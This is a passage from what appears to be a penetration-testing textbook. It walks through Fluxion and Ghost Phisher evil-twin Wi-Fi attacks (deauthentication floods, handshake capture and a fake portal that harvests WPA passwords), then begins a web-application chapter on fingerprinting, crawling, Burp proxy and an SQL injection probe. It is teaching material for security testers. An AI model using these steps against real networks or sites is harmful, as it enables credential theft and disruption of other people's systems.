- Creates a fake AP within seconds to imitate the original AP
- It is capable of spawning MDK3 (a tool to inject packets into the wireless networks)
- Automatically launches a fake DNS server to capture all the DNS requests and redirects them to the hosted machine
- A fake web page is created as a portal to the key in the password
- Automatic termination of the session once the key is found

Once Fluxion has been cloned, make sure that you run the install.sh, which is in the install folder, to install all the dependencies and libraries that are required for Fluxion to run without any issues. The successful installation of the Fluxion attacker is shown in the following screenshot:



Fluxion allows attackers to select from eleven different languages; once a language has been selected, you will be given an option to select from all of the wireless LAN interfaces that are available on your laptop/PC. Upon selecting an interface, Fluxion provides you with an option to select a specific channel or all channels to scan the networks; it is the attacker's choice to select the channel based on the target Wi-Fi. Once the scanning has been performed and identified the list of the wireless APs, press Ctrl + C to move to the next screen, as shown in the following screenshot:

| | WIFI I | LIST | | | |
|--------|---|-----------|------|-----|-----------|
| ID | MAC | CHAN | SECU | PWR | ESSID |
| [1] | 84:BE:52:58:1D:A8 | 1 | WPA | 23% | |
| [2] | A4:71:74:91:99:7C | 1 | WPA2 | 25% | |
| [3] | 40:0D:10:6B:D2:29 | 6 | WPA2 | 26% | |
| [4] | 52:0D:10:68:D2:29 | 6 | WPA2 | 29% | |
| [5] | 80:26:89:71:F3:23 | 11 | WPA2 | 30% | |
| [6] | 52:0D:10:4A:D9:F9 | 11 | WPAZ | 30% | |
| [7] | 40:0D:10:44:AC:F9 | 6 | WPA2 | 35% | |
| [8] | D2:05:C2:D6:2B:49 | 11 | WPA2 | 33% | |
| [9] | 40:0D:10:4A:D9:F9 | 11 | WPA2 | 30% | |
| [10] | 46:1C:A8:4B:86:AF | 11 | WPA2 | 33% | |
| [11] | C0:05:C2:D6:2B:49 | 11 | WPA2 | 34% | |
| [12] | 52:0D:10:44:AC:F9 | 6 | WPA2 | 35% | |
| [13] | 84:BE:52:D1:85:2C | 6 | WPA2 | 48% | |
| [14] | D2:05:C2:02:85:61 | 11 | WPA2 | 53% | |
| [15]* | C0:05:C2:02:85:61 | п. | WPA2 | 54% | VN5345129 |
| [16] | B4:EF:FA:94:21:C5 | 6 | WPA2 | 72% | Cyber Lab |
| (*) Ac | tive clients | | | | |
| deltax | Select target. For re: flux@fluxion]-[~] | scan type | Ē | | |

Once the entire list of wireless APs are available, attackers are now able to proceed with any selected network. For example, from the preceding screenshot, attackers have selected 16 (Cyber Lab) as the target, which is running on encryption wPA2, and have moved on to the next stage of mimicking the Wi-Fi, just like copying their own infrastructure and setting it up without much difference. Fluxion allows us to select two options, as shown in the following screenshot:



As you can see, these two options are as follows:

- Set up a FakeAP through Hostapd
- Set up a FakeAP using airbase-ng

A FakeAP attack is an easy attack method that's used to host a wireless AP with the same name and reduce signal strength using Websploit, thereby forcing the clients to our AP via the FakeAP. The testers will be presented with the handshake check, along with two options: to select either pyrit Or aircrack-ng.

Fluxion is written in such a way that it will automatically utilize MDK3 to deauthenticate all the clients connected to the AP, as shown in the following screenshot:

| Deauthent | icating all clients on Cyber Lab |
|---|--|
| 12:28:28 Waiting for beacon frame (BSSID: B NB: this attack is more effective when targe a connected wireless client (-c $<$ client's ma | H:EF:FA:94:21:C5) on channel −1 sting sc>), |
| 12:26:28 Sending DeAuth (code 7) to broadca 12:26:29 Sending DeAuth (code 7) to broadca 12:26:29 Sending DeAuth (code 7) to broadca 12:26:30 Sending DeAuth (code 7) to broadca 12:26:30 Sending DeAuth (code 7) to broadca 12:26:31 Sending DeAuth (code 7) to broadca 12:26:31 Sending DeAuth (code 7) to broadca 12:26:32 Sending DeAuth (code 7) to broadca 12:26:32 Sending DeAuth (code 7) to broadca 12:26:32 Sending DeAuth (code 7) to broadca 12:26:33 Sending DeAuth (code 7) to broadca 12:26:33 Sending DeAuth (code 7) to broadca 12:26:33 Sending DeAuth (code 7) to broadca | ist |
| 12:26:34 Sending DeAuth (code 7) to broadca 12:26:34 Sending DeAuth (code 7) to broadca | st — BSSID: [B4:EF:FA:94:21:C5] st — BSSID: [B4:EF:FA:94:21:C5] |

Simultaneously, Wi-Fi handshake data capture is captured through another window, as shown in the following screenshot:

| 3 | | (| Capturi | ing da | ita c | on ch | anne | l> 6 | | | | 0 | • | 8 |
|-------------------|-----------|------------|---------|--------|-------|-------|-------|--------|------|-------|-----|---|---|---|
| CH 6][Elapsed: | 6 s][20 | 19-01-12 1 | .2:26 | | | | | | | | | | | |
| BSSID | PWR RXQ | Beacons | #Data | , #/s | CH | MB | ENC | CIPHER | auth | ESSID | | | | |
| B4:EF:FA:94:21:C5 | -9 100 | 94 | 60 | 0 | 6 | 65 | WPA2 | CCMP | PSK | Cyber | Lab | | | |
| BSSID | STATION | | PWR | Rate | Lo | st | Frame | es Pro | be | | | | | |
| B4:EF:FA:94:21:C5 | E4:47:90 | :00:04:20 | -18 | 1e- 1 | | 0 | 6 | 52 | | | | | | |

Once the user has re-connected to the Cyber Lab, during re-connection, Fluxion captures the handshake. This enables attackers to move to the next step, which is to check the handshake, as shown in the following screenshot:



If the handshake resulted in corruption, press 2 go back and launch the same attack. However, it is very rare that attackers aren't able to capture the handshake. If the handshake is valid, then we move on and create our SSL certificate, as shown in the following screenshot. Testers can choose to generate a new SSL certificate or use the existing one:



Once the SSL certificate has been generated, we have an web interface option to select, as shown in the following screenshot. Fluxion provides the option for you to select a language for the web interface that will force the victim who gets connected to our hosted AP to log an adaptive portal:



Now that we are up with the evil twin, with our new access point, testers can validate, as shown in the following screenshot:

| 19 | Indonesian | [10] | (NEUTRA) | | - | | |
|-----|-------------|--------|----------|--|---|---|---|
| 20 | Dutch | [NL] | (NEUTRA) | AP | 0 | 0 | 0 |
| 21 | Danish | [DAN] | (NEUTRA) | | | - | - |
| 22 | Hebrew | [HE] | (NEUTRA) | Using interface whand with hwaddy bitefifat94129:05 and spid "Luber Lab" | | | |
| 23 | Tha1 | LIM1 | (NEUTRA) | wlen1: interface state LNGNITIAL12ED->ENGELED | | | |
| 241 | Portuguese | [88] | (NEUTRA) | wian1: HP-ENHELED | | | |
| 25 | Slovenian | [SVN] | (NEUTRA) | | | | |
| 26 | Belkin | [ENG] | | | | | |
| 271 | Netgear | [ENG] | | | | | |
| 28 | Huawei | [ENG] | | | | | |
| 29 | Verizon | [ENG] | | | | | |
| 30 | Netgear | [ESP] | | | | | |
| 31 | Arris | [ESP] | | | | | |
| 32 | Vodafone | [ESP] | | | | | |
| 351 | TP-Link | [ENG] | | | | | |
| 341 | Ziggo | [NL] | | | | | |
| 351 | KPN | ENL-1 | | | | | |
| 36 | Ziggo2016 | [NL] | | | | | |
| 371 | FRITZBOX DE | [DE] | | | | | |
| 38 | FRITZBOX EN | GTENG1 | | | | | |

When attackers perform the FakeAP attack, they are able to see the following screens running in a completely automated manner. Here, a DHCP server, fake DNS server, and a fake website are being hosted on the same system running while running Fluxion in Kali Linux:



Attackers can confirm whether there are any victims connected to their fake AP in the Wifi Information tab. This will display the connected hostname, along with the fake IP address and original MAC address under the clients Online section, as shown in the following screenshot:



On the other hand, victims who are connected to the fake AP will be presented with an additional mode to log in so that they can access the internet. For example, the following screenshot depicts the message a victim will receive on Windows: Additional log on information may be required. * × Click to open your browser

Once the victim clicks on the additional login information or tries to access any URL, they will redirected to a login page that was set up during our web interface selection, as shown in the following screenshot:

| The source of th | ρ = C @Login Page × |
|--|---|
| | ESSID: 1 BSSID: 1 Channel: <u>11</u> For security reasons, enter the WPA key to access the internet. |
| Enter your WPA password | |
| Submit | |

If the victim enters the right WPA password, this will be used to crack the password from the handshake that was captured during the initial stages. A successful password crack will be displayed in the Wifi Information tab, and the handshake and cracked password will be stored in the root folder by default:

| | Wifi Information | | | | | | | | | | | | | | | |
|----------------|--------------------|------------------------------------|------------------------------|-----------------------|----------------------|---------------------|----------------------|----------------------|-------------------|----------|-------------|---------------------|----------|--------------|----------------------|----------------------|
| [00:00:00] 1/0 | key | js t | test | ed (| 75. | 48 | k/s |) | | | | | | | | |
| Time left: | | | | | | | | | | | | | | | | |
| | | | KEY | FOU | ND I | L | MES | SMOT | ill | 1 | | | | | | |
| Master Key | ः ह 1 | 30 F | E1 2 36 8 | E 92 B 48 | 6B F6 | CE 99 | 30 51 | 35 15 | A1. 94 | 34 C7 | BC 50 | 3E 81 | B3 61 | 01 04 | 70 05 | EA 20 |
| Transient Key | : F I E I | 45 7 14 5 14 7 16 17 (| 77 5 5F 2 71 B CC C | F 133 9 55 6 82 | 48 B2 48 89 | 0D 24 助 3A | 14 OE AF FC | 29 32 AC 78 | 防 死 行 28 | 80 m % F | 95 14 10 15 | 78 73 00 时 | 丙元年間 | 69 86 E C | 20 B4 16 10 | 74 BA 62 72 |
| Eapol HMAC | : 1 | F | 30 4 | 4 EE | 90 | CF | 38 | 80 | E 2 | 36 | AF | FB | 00 | 09 | 27 | E 2 |



All of the tests in this section regarding Fluxion can be found at https://github.com/wi-fi-analyzer/fluxion.git. Any other clone of Fluxion on the internet is subject to customization and is known for library and other compatibility issues.

Working with Ghost Phisher

Similar to Fluxion, Kali has a built-in application to perform Wi-Fi phishing activities in a GUI fashion. Ghost Phisher is built to identify wireless connections and has Ethernet security auditing in mind. It is completely written in Python and Python QT for the GUI library.

To harvest the user's credentials, attackers can utilize the Ghost Phisher application to launch a fake AP, as shown in the following screenshot:

| | Ghost Phish | er | | |
|--|-------------|-----------------|---------------------------|-----------------------------------|
| we Access Freed (File DHI Server) have DHCP Server 1 have HTTP Server 104051T True | Secondition | #PEads Priceing | Parenter fredering - Rend | V1.6 |
| DNS Interface Settings | | | | |
| Laughtek Address 🔻 | | 127.0.03 | | * |
| Gover Interface Lauphan Address | | | | Service Lannage at \$27.0.0.1 |
| UPPOND Part 33 | | | | Faction: Set Mar 38 11:51:37 2017 |
| Jacob Response Settings | | | | |
| Broadce all quarters to the Editoric galation. (The currently opticated P address 1) recommendations (1) | init : | | | |
| [172.1880.134 | 1998 B | | | 1 |
| O Require with their address only to the future of without document. | | | | |
| kahme: | Webs | ee [| | |
| | | | | |
| lation | | | | |
| Thereing Natio (NVS Server Energied DVS Service of Car Mar 10 11/53) 27 2007 | | | | |
| ann an Anna an | | | Step | |

GhostPhisher currently provides the following features, all of which can be utilized by penetration testers or attackers:

- Creating an HTTP server
- DNS server
- DHCP server

- Credential logging page (for phishing any username and password)
- Access point emulator
- Advanced session hijacking module
- Ghost Phisher provides the option to perform ARP cache poisoning to perform MiTM and DoS attacks, similar to ettercap/bettercap
- Allows attackers to embed Metasploit binding techniques
- A SQLite database as credential storage

Summary

In this chapter, we have examined different tasks that are required to perform a successful attack against any wireless network, wireless adapter configuration, and also how to configure the wireless modem and reconnaissance of APs using tools such as aircrack-ng and Kismet. In this chapter, we also learned about the complete suite of aircrack-ng tools that are used to identify hidden networks, bypass MAC authentication, compromise WPA/WPA2, and WPA enterprise. We also saw how to we can utilize the existing automated tool Wifite to perform a quick capture of handshake and crack passwords offline or with a good dictionary with the use of multiple options. Then, we took a deep dive into setting up a FakeAP using Fluxion and Ghost Phisher, and performed a DoS attack against the wireless networks.

In the next chapter, we will focus on how to assess a website using a methodology that's specific to this type of access, thereby conducting the reconnaissance and scanning that's necessary to identify vulnerabilities that may be exploitable. We'll see how attackers take advantage of these vulnerabilities with automated tools, such as exploit frameworks and online password cracking. Finally, we'll be able to conduct the most important attacks against a web application, and then leverage this access with a web shell to fully compromise the web services. We will also look into specific services and why and how they are vulnerable to DoS attacks.

Exploiting Web-Based Applications

In previous chapters, we reviewed the attacker's kill chain, the specific approach used to compromise networks and devices and disclose data or hinder access to network resources. In <u>chapter 5</u>, *Advanced Social Engineering and Physical Security*, we examined the different routes of attack, starting with physical attacks and social engineering. In <u>chapter 6</u>, *Wireless Attacks*, we saw how wireless networks could be compromised.

In this chapter, we'll focus on one of the most common attack routes, through websites and web-based applications.

With adoption of technology, we can see multiple virtual banks in the market. These banks do not have any physical infrastructure; they are just made up of simple web/mobile applications. Web-based services are ubiquitous, and most organizations allow remote access to these services with almost constant availability. To penetration testers and attackers, however, these web applications expose backend services on the network, client-side activities of users accessing the website, and the connection between users and the web application/service's data.

This chapter will focus on the attacker's perspective when looking at web applications and web services. We will review attacks against connectivity in chapter 8, *Client-Side Exploitation*.

By the end of this chapter, you will have learned about the following:

- Web application hacking methodology
- The hacker's mind map
- Vulnerability scanning
- Application-specific attacks
- Exploiting vulnerabilities in crypto and web services
- Maintaining access to compromised systems with web backdoors

Web application hacking methodology

Systematic and goal-oriented penetration testing always starts with the right methodology. The following diagram shows how web application hacking is done:



The methodology is divided into six stages: set target, spider and enumerate, vulnerability scanning, exploitation, cover tracks, and maintain access. These are explained in detail as follows:

- 1. **Set target**: Setting the right target during a penetration test is very important, as attackers will focus more on specific vulnerable systems to gain system-level access, as per the kill chain method.
- 2. Spider and enumerate: At this point, attackers have identified the list of

web applications and are digging deeper into specific vulnerabilities. Multiple methods are engaged to spider all the web pages, identify technology, and find everything relevant to advance to the next stage.

- 3. **Vulnerability scanning**: All known vulnerabilities are collected during this phase, using well-known vulnerability databases containing public exploits or known common security misconfigurations.
- 4. **Exploitation**: This phase allows users to exploit known and unknown vulnerabilities, including the business logic of the application. For example, if an application is vulnerable to admin interface exposure, attackers can try to gain access to the interface by performing various types of attacks such as password guessing or brute-force attacks, or by exploiting specific admin interface vulnerabilities (for example, a JMX console attack on an admin interface without having to log in, deploy war files, and run a remote web shell).
- 5. **Cover tracks**: At this stage, attackers erase all evidence of the hack. For example, if a system has been compromised by a file upload vulnerability and remote commands were executed on the server, attackers would attempt to clear the application server log, web server log, system logs, and other logs. Once tracks are covered, attackers ensure no logs are left that could reveal the origin of their exploitation.
- 6. **Maintain access:** Attackers could potentially plant a backdoor and also go on to perform privilege escalation or use the system as a zombie to perform more focused internal attacks, such as spreading ransomware on files that are shared in network drives, or even (in the case of bigger organizations) adding the victim system to a domain in order to take over the enterprise domain.

The hacker's mind map

There is no substitute for the human mind. In this section, we will focus more on how a web application looks from the perspective of an attacker. The following diagram shows a mind map of a web application hack:


The mind map is split into two categories: attackers can attack either server-side vulnerabilities or client-side vulnerabilities. These vulnerabilities normally occur for one of the following reasons:

- Use of old or unpatched technology
- Poor security configuration for the latest technology
- Coding without security in mind
- The human factor: a lack of skilled staff

On the server side, attackers would typically perform the following list of attacks:

- Web application firewall evasion
- Injection attacks
- Remote code execution
- Remote file inclusion/local file inclusion
- Directory path traversal
- Exploiting session management
- Exploiting the logic of the system or application
- Identifying any relevant information that can help them to perform more dedicated attacks

Client-side attacks are focused on exploiting the vulnerabilities that exist on the client side, rather that the server side. These could include browsers, applications (thick/thin clients), or network, as follows:

- Flash vulnerabilities: Flash Player has 1,068 known vulnerabilities (see http s://www.cvedetails.com/vulnerability-list/vendor_id-53/product_id-6761/Adobe-Flash-P layer.html) as of December 8 2018.
- JavaScript and Java vulnerabilities.
- DNS pinning/rebinding vulnerabilities: DNS rebinding is a DNS-based attack on the code embedded in web pages. Normally, requests from code embedded in web pages (JavaScript, Java, and Flash) are bound to the website they originate from (a same-origin policy). A DNS rebinding attack can be used to improve the ability of JavaScript-based malware to penetrate private networks and subvert the browser's same-origin policy.
- Non-DNS pinning vulnerabilities.
- Client script injection vulnerabilities/cross-site scripting: reflected, persistent (stored), and DOM-based.

With these vulnerabilities in mind, attackers are equipped with a full list of exploitation kits and are ready to start reconnaissance.

Reconnaissance of web apps

Web applications and the delivery of services from those apps are particularly complex. Typically, services are delivered to the end user using a multi-tiered architecture with application servers and web servers that are accessible from the public internet, while communicating with middleware services, backend servers, and databases located on the internal network.

The complexity is increased by several additional factors that must be taken into account during testing, which include the following:

- Network architecture, including security controls (firewalls, IDS/IPS, and honeypots), and configurations such as load balancers
- The platform architecture (hardware, operating system, and additional applications) of systems that host web services
- Applications, middleware, and final-tier databases, which may employ different platforms (Unix or Windows), vendors, programming languages, and a mix of open source, commercial, and proprietary software
- Authentication and authorization processes, including the process for maintaining session state across the application
- The underlying business logic that governs how the application will be used
- Client-side interactions and communications with the web service

Given the proven complexity of web services, it is important for a penetration tester to be adaptable to each site's specific architecture and service parameters. At the same time, the testing process must be applied consistently to ensure that nothing is missed.

Several methodologies have been proposed to accomplish these goals. The most widely accepted one is the **Open Web Application Security Project (OWASP**; see www.owasp.org) and its list of the top 10 vulnerabilities.

As a minimum standard, OWASP provides direction to testers. However, focusing on only the top 10 vulnerabilities is short-sighted, and the methodology has demonstrated some gaps, particularly when applied to finding vulnerabilities in the logic of how an application should work to support business practices.

Using the kill chain approach, some activities specific to web application reconnaissance that should be highlighted include the following:

- Identifying the target web app, especially with regards to where and how it is hosted.
- Enumerating the site directory structure and files of the target website, including determining whether a **content management system (CMS)** is in use. This may include downloading the website for offline analysis, including document metadata analysis, and using the site to create a custom word list for password cracking (using a tool such as crunch). It also ensures that all support files are identified.
- Identifying the authentication and authorization mechanisms, and determining how the session state is maintained during a transaction with that web service. This will usually involve an analysis of cookies and how they are used, utilizing a proxy tool.
- Enumerating all forms. As these are the primary means for a client to input data and interact with the web app service, they are the location of several exploitable vulnerabilities, such as SQL/XML/JSON injection attacks and cross-site scripting.
- Identifying other areas that accept input, such as pages that allow for file upload, as well as any restrictions on accepted upload types.
- Identifying how errors are handled, and the actual error messages that are received by a user; frequently, the error will provide valuable internal information such as the software version used, or internal filenames and processes.

The first step is to conduct the passive and active reconnaissance previously described (refer to chapter 2, *Open Source Intelligence and Passive Reconnaissance*, and chapter 3, *Active Reconnaissance of External and Internal Networks*).

In particular, ensure that hosted sites are identified, and then use DNS mapping to identify all the hosted sites that are delivered by the same server. One of the most common and successful means of attack is to attack a non-target site hosted on the same physical server as the target website, exploit weaknesses in the server to gain root access, and then use the escalated privileges to attack the targeted site.

This approach works pretty well in a shared cloud environment, where many

applications are hosted on the same **Software as a Service (SaaS)** model.

Detection of web application firewall and load balancers

The next step is to identify the presence of network-based protective devices, such as firewalls, IDS/IPS, and honeypots. An increasingly common protective device is the **Web Application Firewall (WAF)**.

If a WAF is being used, testers will need to ensure that the attacks, especially those that rely on crafted input, are encoded to bypass the WAF.

WAFs can be identified by manually inspecting cookies (some WAFs tag or modify the cookies that are communicated between the web server and the client), or by changes to the header information (identified when a tester connects to port 80 using a command-line tool such as Telnet).

The process of WAF detection can be automated using the nmap script http-wafdetect.nse, as shown in the following screenshot:



The nmap script identifies that a WAF is present; however, testing of the script has demonstrated that it is not always accurate in its findings, and that the returned data may be too general to guide an effective strategy to bypass the firewall.

The wafwoof script is an automated tool to identify and fingerprint web-based firewalls; testing has determined that it is the most accurate tool for this purpose. The script is easy to invoke from Kali, and ample output is shown in the

following screenshot:



Load balancing detector (**lbd**) is a Bash shell script that determines whether a given domain uses DNS and/or HTTP load balancing. This is important information from the perspective of a tester, as it can explain seemingly anomalous results that occur when one server is tested, and then the load balancer switches requests to a different server. ^{1bd} uses a variety of checks to identify the presence of load balancing. A sample output is shown in the following screenshot:

| cootskall: # 1bd www | |
|--|--|
| lbd - load balancing detector 0.4 | Checks if a given domain uses load-balancing. Written by Stefan Behts (http://ge.mise.nu) Proof-of-concept! Might give false positives. |
| Checking for DNS-Loadbalancing: PC www.loadbalancing: DN address 10. www.loadbalancing names address 10. | unm 1 = 125 13 = .25 |
| Checking for HTTP-Loadbalancing (S cloudflare NOT FORD | erver;[] |
| Checking for WTVP-Loadbalancing [E :53:51, 19:53:51, 19:53:52, 19:53: 3:53, 19:53:53, 19:53:53, 19:53:53 54, 19:53:54, 19:53:55, 19:53:56, 19 ; 19:53:56, 19:53:56, 19:53:56, 19 | atel: 19:53:50, 19:53:51, 19:53:51, 19:53:51, 19:53:51, 19:53:51, 19:53:51, 19:53:51, 19:53:51, 19:53:52, 19:53:52, 19:53:52, 19:53:52, 19:53:53, 19:53:53, 19:53:53, 19:53:53, 19:53:53, 19:53:54, 19:53:54, 19:53:54, 19:53:54, 19:53:54, 19:53:54, 19:53:54, 19:53:54, 19:53:54, 19:53:55, 10:50; 100 |
| Checking for HTTF-Loadbalancing [D < CF-RAT: 484d5093b3785a91-14R > CF-RAT: 484d5092b3785a91-14R | iff): Pouse |

www.torm.com does Load-balancing. Found via Methods: DNS HTTP[Diff]

Fingerprinting a web application and CMS

Web application fingerprinting is the first task for the penetration tester, to find out the version and type of a running web server, and the web technologies implemented. These allow attackers to determine known vulnerabilities and the appropriate exploits.

Attackers can utilize any type of command-line tool that has the capability to connect to the remote host. For example, we have used the netcat command in the following screenshot to connect to the victim host on port 80, and issued the HTTP HEAD command to identify what is being run on the server:

```
root@kali:~# nc -vv 192.168.0.101 80
192.168.0.101: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.0.101] 80 (http) open
HEAD / HTTP/1.0
HTTP/1.1 400 Bad Request
Date: Sat, 15 Dec 2018 23:27:01 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/5.6.39
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Expires: Sat, 15 Dec 2018 23:27:01 GMT
```

This returns an HTTP server response that includes the type of web server that the application is being run on, and the server section providing detailed information about the technology used to build the app—in this case, PHP 5.6.39.

Now, the attackers can determine known vulnerabilities using sources such as

CVE Details (see https://www.cvedetails.com/vulnerability-list/vendor_id-74/product_id-128/PHP-PHP.html).

The ultimate goal of penetration testing is to obtain sensitive information. The website should be inspected to determine the **Content Management System** (**CMS**) that has been used to build and maintain it. CMS applications such as Drupal, Joomla, and WordPress, among others, may be configured with a vulnerable administrative interface that allows access to elevated privileges, or may contain exploitable vulnerabilities.

Kali includes an automated scanner, BlindElephant, which fingerprints a CMS to determine version information, as follows:

| BlindElephant.py <website.com> joomla

A sample output is shown in the following screenshot:



BlindElephant reviews the fingerprint for components of the CMS, and then provides a best guess for the versions that are present. However, as with other applications, we have found that it may fail to detect a CMS that is present; therefore, always verify results against other scanners that crawl the website for specific directories and files, or manually inspect the site.

One particular scanning tool, automated web crawlers, can be used to validate information that has already been gathered, as well as to determine the existing directory and file structure of a particular site. Typical findings of web crawlers include administration portals, configuration files (current and previous versions) that may contain hardcoded access credentials and information on the internal structure, backup copies of the website, administrator notes, confidential personal information, and source code.

Kali supports several web crawlers, including Free Burp Suite, DirBuster, OWASP-ZAP, Vega, WebScarab, and WebSlayer. The most commonly used tool is DirBuster.

DirBuster is a GUI-driven application that uses a list of possible directories and files to perform a brute-force analysis of a website's structure. Responses can be viewed in a list or a tree format that reflects the site's structure more accurately. Output from executing this application against a target website is shown in the following screenshot:

| | OWASP DirBuster 1.0-RC1 - We | Application Brute Forcing | 000 |
|--------------------------------|--|--------------------------------|------------------------|
| File Options | About Help | | |
| http:// ' | 80/ rmation ¹ Results - Ust View: Dirs: 4 Files: 8 \ Res | ults - Tree View 🔥 Errors: D 🔪 | |
| Туре | Found | Response | Size |
| Dir | 1 | 200 | 7609 |
| Dir | /Style/ | 403 | 1417 |
| Dir | /Style/mage/ | 403 | 1417 |
| Dir | /mages/ | 403 | 1417 |
| Dir | /Script/ | 403 | 1417 |
| File | /Script/jquery.js | 200 | 95131 |
| File | /Script/template.js | 200 | 17093 |
| File | /Script/onlinedish.js | 200 | 4640 |
| File | /Script/common.js | 200 | 23511 |
| File | /Script/map.js | 200 | 10642 |
| File | /Script/customerOb.js | 200 | 1617 |
| File | /Script/TopDiv.js | 200 | 17446 |
| File | /Script/jquery.easytabs.min.js | 200 | 9227 |
| Current speed Average speed | : 0 requests/sec i: (T) 22. (C) 15 requests/sec | (Select and right (| click for more options |
| Parse Queue 5 | iče: 0 | Current number of running t | threads: 10 |
| Total Requests | : 456/103445 | Cha | nge |
| Time To Finish: | 01:54:25 | | |
| WHERE'S | TT Fausa T Stop | | = Beport |
| Program pause | dl | | /Style/-audreyt |

Mirroring a website from the command line

Attackers may need to spend a lot of time identifying the vulnerabilities in specific pages/URL locations. Common tactics include cloning or downloading all available website information locally to narrow down the right entry point to exploit, and performing social engineering attacks in order to harvest email addresses and other relevant information.

It is also possible to copy a website directly to the tester's location. This allows the tester to review the directory structure and its contents, extract metadata from local files, and use the site's contents as an input to a program such as crunch, which will produce a personalized word list to support password cracking.

Once you have mapped out the basic structure of the website and/or web services that are being delivered, the next stage of the kill chain is to identify the vulnerabilities that can be exploited.

Kali provides an inbuilt application, httrack, which provides the option for the penetration tester to download all the website's contents to the local system. httrack is both a command-line and GUI utility, widely used to make a local copy of any website. Attackers can directly issue the httrack http://targetwebapp/ -0 outputfolder command, as shown in the following screenshot:



Once httrack is complete, testers must be able to load the application locally and harvest information or identify the implementation flaw.

Client-side proxies

A client-side proxy intercepts HTTP and HTTPS traffic, allowing a penetration tester to examine communications between the user and the application. It allows the tester to copy the data or interact with requests that are sent to the application.

Client-side proxies were initially designed for debugging applications; the same functionality can be abused by attackers to perform man-in-the-middle or man-in-the-browser attacks.

Kali comes with several client-side proxies, including Burp Suite, OWASP ZAP, Paros, ProxyStrike, the vulnerability scanner Vega, and WebScarab. After extensive testing, we have come to rely on Burp Proxy, with ZAP as a backup tool. In this section, we will explore Burp Suite.

Burp Proxy

Burp is primarily used to intercept HTTP(S) traffic; however, it is part of a larger suite of tools that has several additional functions, including the following:

- An application-aware spider that crawls the site
- A vulnerability scanner, including a sequencer to test the randomness of session tokens, and a repeater to manipulate and resend requests between the client and the website (the vulnerability scanner is not included with the free version of Burp Proxy that is packaged in Kali)
- An intruder tool that can be used to launch customized attacks (there are speed limitations in the free version of the tool included with Kali; these are removed if you purchase the commercial version of the software)
- The ability to edit existing plugins or write new ones in order to extend the number and type of attacks that can be used

To use Burp, ensure that your web browser is configured to use a local proxy; usually, you will have to adjust the network settings to specify that HTTP and HTTPS traffic must use the localhost (127.0.0.1) at port 8080.

After setting up the browser, open the proxy tool by running <code>burpsuite</code> in the Terminal and manually map the application in the Target tab. This is accomplished by turning off proxy interception, and then browsing the entire application. Follow every link, submit the forms, and log in to as many areas of the site as possible. Additional content will be inferred from various responses.

The site map will populate an area under the Target tab. Automated crawling can also be used by right-clicking on the site and selecting Spider This Host; however, the manual technique gives the tester the opportunity to become more familiar with the target, and it may identify areas to be avoided, such as /.bak files or .svn files, which penetration testers often overlook during assessment.

Once the target is mapped, define the Target - Scope by selecting branches within the site map and using the Add to scope command. Once this is completed, you can hide items that are not of interest on the site map using display filters. A site map created of a target website is shown in the following screenshot:

| Burp Into. | ster Rep | eater We | dow Help | | | | | | | | | | | | |
|------------|--|--|---------------|-------------|--------------|-------------------|-------------|-----------|--------------------|----------------|--------------------|---------|--------------|----------|-------|
| Tarpet | Presy | Spider | Scarner | intrudier | Repeater | Segrencer | Decoder | Comp | aret | Extender | Projectio | ciers | User options | | 1 |
| Sile map | Scap | ed Asms; 1 | hiding CSS, A | nage and ge | neral binary | context. hiding | 4xx respons | ies, hidi | ng e ng | pty tolders | | - | | | 1.00 |
| W Litte | A180 188 | 0.110 | | | | 081 | | decend. | ORI | | | Parama | SOIDIB . | Longth | 1.000 |
| 175 | D7 82. 100 | u. 149 | | | 1 | 10.1192.105.0.1 | 28 | JET. | /mu | /Indaes/ | | | 200 | 47595 | HT |
| 17 | and ratio | a behalf | | | 1 | 8pt.//190.168.0.1 | 1218) | GET | /mul | tilidan/?pape | | 8 | 200 | 52533 | HT |
| | fashhowrit | Actes . | | | 0 | tp.//192.168.0.1 | 120 | 3ET | mu | (ilidaes?page | -creals | 3 | 200 | 47554 | нт |
| - 1 | CERS. | | | | n | Rp://192.168.0.1 | 29 | 3ET | mu | tilldaer?page | =source | 8 | 200 | 53226 | HT |
| EL. | retilidae | | | | 1 | tp://192.166.0.1 | 20 | 361 | 110 | tilldøer?page | ctext-file | (40) | 200 | 50442 | нт |
| | rutilitar | | | | - 1 h | tp://192.188.0.1 | 20 | SET . | (mu) | filidae/Trame | r.html | 1 | 200 | 1740 | HT |
| A 10 | 2 / | | | | - 1 | tp://192.188.0.1 | 120 | GET | ALC: N | ulidse/mape | 81 | - 69 | 200 | 10800 | нт |
| 1.1 | - | | | | h | tp://192.168.0.1 | 129 | BET | ///10 | tilidaerinolud | esi | 6 | 200 | 4588 | нт |
| | 1 cather | data also | | | n n | tp://192.168.0.1 | 20 | BET | ANU. | tilidae/includ | esipep-e | 60 | 200 | 497 | нт |
| | docum | orbition . | | | 1 | tp://192.166.0.1 | 29 | 361 | (TRI | indee/index. | phip | | 200 | 47904 | нт |
| | 1 Carter | html | | | h | tp://192.188.0.1 | 28 | 736 | /mu | filldse/index | php?pieg | 8 | 200 | 62005 | HT |
| | in the second | anial relation | er ofte | | 1 | | | | | | and and the second | | | | - |
| 1 | manes | 18c-initiation | on but h | | | Request Re | sponse | | | | | | | | |
| | ionkute | | | | | | 1 | <u> </u> | | | | | | | |
| 1.0 | index of | ne. | | | | Raw field | era Max | | | | | | | | |
| | invance. | - | | | GE | T /mortillis | iae/ SITTP | /1.1 | _ | | | | | | |
| | parasoci | an a | | | Ho | st: 152.360 | 1.0.120 | | | | | | | | |
| | T instance | and a street | | | Ac | : epc : */* | | | | | | | | | |
| Ē | and un | database | the state | | Ar | cept-Langas | nde: eur | | | | | | | | |
| | shies | deferrante (| 1.10 | | Us | ar-Agent: 1 | fonilla/5 | D (co | ap etc. | this; MSI | 8 5.0: 8 | findows | DT 6.1) 9 | 111841 2 | 1.93 |
| | all all dates | aber C | | | Go | nnection: « | LOSE . | | 40.00 | | | | | | |
| 28 | and a state of the | | | | | retex: vect | 100,000,1 | ev-u-4 | -1/44 | 101112036 | | | | | |
| | WRUGE C | ALC: NO. | | | | | | | | | | | | | |

Once spidering has been completed, manually review the directory and file list for any structures that do not appear to be part of the public website, or that appear to be unintentionally disclosed. For example, directories titled admin, backup, documentation, Or notes should be manually reviewed.

Manual testing of the login page using a single quote as the input produces an error code suggesting that it may be vulnerable to an SQL injection attack; a sample return of the error code is shown in the following screenshot:

